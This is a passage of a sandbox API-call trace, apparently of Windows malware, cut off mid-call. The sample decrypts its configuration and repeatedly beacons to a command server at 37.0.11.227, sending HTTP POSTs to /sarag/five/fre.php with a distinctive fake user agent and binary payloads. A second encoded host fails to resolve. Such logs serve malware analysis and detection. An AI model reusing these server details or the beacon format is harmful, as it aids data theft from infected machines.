[0293.779] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0293.786] GetProcessHeap () returned 0x690000 [0293.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0293.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.788] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0293.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.789] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.790] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.790] GetProcessHeap () returned 0x690000 [0293.790] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0293.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.793] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0293.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.797] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0293.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.798] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0293.798] GetProcessHeap () returned 0x690000 [0293.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0293.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.799] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0293.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.801] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0293.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.802] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0293.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.803] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0293.803] GetProcessHeap () returned 0x690000 [0293.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0293.803] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0293.803] GetProcessHeap () returned 0x690000 [0293.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0293.803] socket (af=2, type=1, protocol=6) returned 0x978 [0293.804] connect (s=0x978, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0293.845] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0293.845] GetProcessHeap () returned 0x690000 [0293.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0293.845] GetProcessHeap () returned 0x690000 [0293.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0293.846] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0293.847] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0293.847] GetProcessHeap () returned 0x690000 [0293.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0293.847] GetProcessHeap () returned 0x690000 [0293.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0293.848] GetProcessHeap () returned 0x690000 [0293.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0293.848] GetProcessHeap () returned 0x690000 [0293.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0293.849] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0293.850] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0293.850] GetProcessHeap () returned 0x690000 [0293.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0293.850] GetProcessHeap () returned 0x690000 [0293.850] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0293.850] send (s=0x978, buf=0x6ad508*, len=242, flags=0) returned 242 [0293.851] send (s=0x978, buf=0x6aba40*, len=159, flags=0) returned 159 [0293.851] GetProcessHeap () returned 0x690000 [0293.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0293.851] recv (in: s=0x978, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0293.928] GetProcessHeap () returned 0x690000 [0293.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0293.929] GetProcessHeap () returned 0x690000 [0293.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0293.933] GetProcessHeap () returned 0x690000 [0293.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0293.934] GetProcessHeap () returned 0x690000 [0293.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0293.934] closesocket (s=0x978) returned 0 [0293.935] GetProcessHeap () returned 0x690000 [0293.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0293.935] GetProcessHeap () returned 0x690000 [0293.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0293.935] GetProcessHeap () returned 0x690000 [0293.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0293.936] GetProcessHeap () returned 0x690000 [0293.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0293.936] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17f0) returned 0x978 [0293.939] Sleep (dwMilliseconds=0xea60) [0293.941] GetProcessHeap () returned 0x690000 [0293.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0293.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.943] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.982] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0293.993] GetProcessHeap () returned 0x690000 [0293.993] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0294.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.004] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0294.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.005] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.007] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.007] GetProcessHeap () returned 0x690000 [0294.007] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0294.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.008] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0294.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.010] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0294.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.014] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0294.014] GetProcessHeap () returned 0x690000 [0294.014] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0294.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.015] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0294.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.016] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0294.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.018] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0294.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.019] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0294.019] GetProcessHeap () returned 0x690000 [0294.019] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0294.019] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0294.019] GetProcessHeap () returned 0x690000 [0294.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0294.019] GetProcessHeap () returned 0x690000 [0294.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0294.020] GetProcessHeap () returned 0x690000 [0294.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0294.020] GetProcessHeap () returned 0x690000 [0294.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0294.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.021] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0294.270] GetProcessHeap () returned 0x690000 [0294.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0294.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.280] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0294.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.281] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.282] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.282] GetProcessHeap () returned 0x690000 [0294.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0294.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.292] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0294.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.294] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0294.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.295] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0294.295] GetProcessHeap () returned 0x690000 [0294.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0294.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.296] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0294.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.297] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0294.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.298] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0294.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.305] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0294.305] GetProcessHeap () returned 0x690000 [0294.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0294.325] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0294.325] GetProcessHeap () returned 0x690000 [0294.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0294.326] socket (af=2, type=1, protocol=6) returned 0x97c [0294.326] connect (s=0x97c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0294.369] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0294.374] GetProcessHeap () returned 0x690000 [0294.374] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0294.374] GetProcessHeap () returned 0x690000 [0294.374] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0294.375] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0294.376] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0294.376] GetProcessHeap () returned 0x690000 [0294.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0294.376] GetProcessHeap () returned 0x690000 [0294.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0294.379] GetProcessHeap () returned 0x690000 [0294.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0294.379] GetProcessHeap () returned 0x690000 [0294.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0294.380] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0294.381] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0294.381] GetProcessHeap () returned 0x690000 [0294.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0294.381] GetProcessHeap () returned 0x690000 [0294.382] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0294.382] send (s=0x97c, buf=0x6ad508*, len=242, flags=0) returned 242 [0294.382] send (s=0x97c, buf=0x6aba40*, len=159, flags=0) returned 159 [0294.382] GetProcessHeap () returned 0x690000 [0294.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0294.382] recv (in: s=0x97c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0294.457] GetProcessHeap () returned 0x690000 [0294.458] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0294.458] GetProcessHeap () returned 0x690000 [0294.458] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0294.459] GetProcessHeap () returned 0x690000 [0294.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0294.459] GetProcessHeap () returned 0x690000 [0294.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0294.459] closesocket (s=0x97c) returned 0 [0294.460] GetProcessHeap () returned 0x690000 [0294.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0294.460] GetProcessHeap () returned 0x690000 [0294.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0294.461] GetProcessHeap () returned 0x690000 [0294.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0294.461] GetProcessHeap () returned 0x690000 [0294.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0294.477] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17f4) returned 0x97c [0294.524] Sleep (dwMilliseconds=0xea60) [0294.530] GetProcessHeap () returned 0x690000 [0294.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0294.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.531] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.581] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0294.644] GetProcessHeap () returned 0x690000 [0294.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0294.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.645] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0294.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.646] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.648] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.648] GetProcessHeap () returned 0x690000 [0294.650] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0294.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.655] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0294.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.657] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0294.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.659] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0294.659] GetProcessHeap () returned 0x690000 [0294.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0294.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.661] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0294.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.662] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0294.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.664] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0294.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0294.665] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0294.665] GetProcessHeap () returned 0x690000 [0294.665] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0294.665] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0294.666] GetProcessHeap () returned 0x690000 [0294.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0294.667] GetProcessHeap () returned 0x690000 [0294.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0294.667] GetProcessHeap () returned 0x690000 [0294.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0294.668] GetProcessHeap () returned 0x690000 [0294.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0294.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.669] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.707] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0294.751] GetProcessHeap () returned 0x690000 [0294.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0294.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.753] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0294.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.757] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.761] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.761] GetProcessHeap () returned 0x690000 [0294.762] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0294.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0294.763] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: 